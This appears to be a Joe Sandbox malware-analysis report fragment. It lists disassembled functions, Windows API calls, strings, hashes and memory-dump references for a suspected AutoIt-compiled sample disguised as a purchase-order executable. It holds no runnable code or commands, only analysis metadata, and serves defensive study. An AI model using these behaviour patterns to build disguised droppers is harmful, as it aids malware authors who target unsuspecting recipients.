                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                  • String ID: 0$2
                                  • API String ID: 93392585-3793063076
                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                  Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                  Download Yara Rule
                                  APIs
                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                  • String ID: crts
                                  • API String ID: 586820018-3724388283
                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                  Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,0040F545,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,004A90E8,C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe,?,0040F545), ref: 0041013C
                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                  • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                  • _wcscat.LIBCMT ref: 0044BCAF
                                  • _wcslen.LIBCMT ref: 0044BCBB
                                  • _wcslen.LIBCMT ref: 0044BCD1
                                  • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                  • String ID: \*.*
                                  • API String ID: 2326526234-1173974218
                                  • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                  • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                  • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                  • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                  Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                  • _wcslen.LIBCMT ref: 004335F2
                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                  • GetLastError.KERNEL32 ref: 0043362B
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                  • _wcsrchr.LIBCMT ref: 00433666
                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                  • String ID: \
                                  • API String ID: 321622961-2967466578
                                  • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                  • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                  Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp
                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                  • API String ID: 1038674560-2734436370
                                  • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                  • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                  Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                  • __lock.LIBCMT ref: 00417981
                                    • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                    • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                    • Part of subcall function 004182CB: RtlEnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                  • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                  • __lock.LIBCMT ref: 004179A2
                                  • ___addlocaleref.LIBCMT ref: 004179C0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                  • String ID: KERNEL32.DLL$pI
                                  • API String ID: 637971194-197072765
                                  • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                  • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                  • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                  • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                  Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _memmove$_malloc
                                  • String ID:
                                  • API String ID: 1938898002-0
                                  • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                  • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                  • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                  • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                  Function 0044B489 Relevance: 12.1, APIs: 8, Instructions: 102fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                  • RtlEnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                  • _memmove.LIBCMT ref: 0044B555
                                  • _memmove.LIBCMT ref: 0044B578
                                  • RtlLeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                  • String ID:
                                  • API String ID: 2737351978-0
                                  • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                  • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                  Function 00415214 Relevance: 12.1, APIs: 8, Instructions: 66threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                  • __calloc_crt.LIBCMT ref: 00415246
                                  • __getptd.LIBCMT ref: 00415253
                                  • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                  • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                  • _free.LIBCMT ref: 0041529E
                                  • __dosmaperr.LIBCMT ref: 004152A9
                                    • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                  • String ID:
                                  • API String ID: 3638380555-0
                                  • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                  • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                                  • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                                  • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                                  Function 0046C84C Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 308COMMON
                                  Download Yara Rule
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 0046C96E
                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorInitLast
                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                  • API String ID: 3207048006-625585964
                                  • Opcode ID: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction ID: 684ba17e2c3ca727561f7970afa8535519679aefa5cdc663b381c32651820a10
                                  • Opcode Fuzzy Hash: ca4782e3f1b8c357821c68e66e95b499971d8adc7301cf0feb6afda3dd37ffd4
                                  • Instruction Fuzzy Hash: F6A19472600209ABDB10DF99DCC1EFEB3B9FB84714F10852EF604A7281E7B59D458BA5
                                  Function 00465489 Relevance: 10.8, APIs: 7, Instructions: 281networkmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                  • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                  • gethostbyname.WSOCK32(?), ref: 004655A6
                                  • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                  • _memmove.LIBCMT ref: 004656CA
                                  • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                  • WSACleanup.WSOCK32 ref: 00465762
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                  • String ID:
                                  • API String ID: 2945290962-0
                                  • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                  • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                  • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                  • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                  Function 0046B6AB Relevance: 10.8, APIs: 7, Instructions: 258registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: ConnectRegistry_memmove_wcslen
                                  • String ID:
                                  • API String ID: 15295421-0
                                  • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                  • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                  • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                  • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                  Function 00467511 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 213COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                  • _wcstok.LIBCMT ref: 004675B2
                                    • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                  • _wcscpy.LIBCMT ref: 00467641
                                  • 758ED0D0.COMDLG32(00000058), ref: 00467774
                                  • _wcslen.LIBCMT ref: 00467793
                                  • _wcslen.LIBCMT ref: 004677BD
                                    • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                  • 758ED1A0.COMDLG32(00000058), ref: 00467807
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473831954.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473855933.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473878379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473897777.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1473946334.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order_ AEPL-2324-1126.jbxd
                                  Similarity
                                  • API ID: _wcslen$_memmove$__getptd_wcscpy_wcstok
                                  • String ID: X
                                  • API String ID: 3297605031-3081909835
                                  • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                  • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                  • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                  • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                  Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                  • CloseFigure.GDI32(?), ref: 0044751F
                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1473771803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1473742311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
